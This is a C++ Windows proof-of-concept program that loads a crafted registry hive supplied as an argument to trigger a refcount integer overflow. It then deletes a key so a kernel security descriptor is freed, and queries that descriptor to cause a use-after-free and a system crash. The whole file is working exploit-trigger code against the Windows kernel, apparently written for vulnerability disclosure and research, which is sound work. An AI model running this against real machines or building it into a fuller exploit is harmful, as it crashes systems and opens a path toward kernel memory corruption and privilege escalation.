#include <Windows.h>

#include <cstdio>

int main(int argc, char** argv) {
  if (argc != 2) {
    printf("Usage: %s <hive file>\n", argv[0]);
    return 1;
  }

  //
  // Load the proof-of-concept hive, triggering the refcount integer overflow.
  //

  HKEY hkey;
  LONG st = RegLoadAppKeyA(argv[1], &hkey, KEY_ALL_ACCESS, 0, 0);
  if (st != ERROR_SUCCESS) {
    printf("RegLoadAppKeyA failed with error %d\n", st);
  }
  
  //
  // Delete one of the keys, dropping the refcount to 0 and causing the security
  // descriptor to be freed.
  //

  st = RegDeleteKeyW(hkey, L"C");

  if (st != ERROR_SUCCESS) {
    printf("RegDeleteKeyW failed with error %d\n", st);
    return 1;
  }

  //
  // Query the security descriptor of the root key, which should result in
  // dereferencing a freed kernel pool pointer and a crash.
  //

  DWORD cbSecurityDescriptor = 0;
  st = RegGetKeySecurity(hkey,
                         DACL_SECURITY_INFORMATION,
                         NULL,
                         &cbSecurityDescriptor);

  if (st != ERROR_SUCCESS) {
    printf("RegGetKeySecurity failed with error %d\n", st);
    return 1;
  }
  
  RegCloseKey(hkey);

  return 0;
}
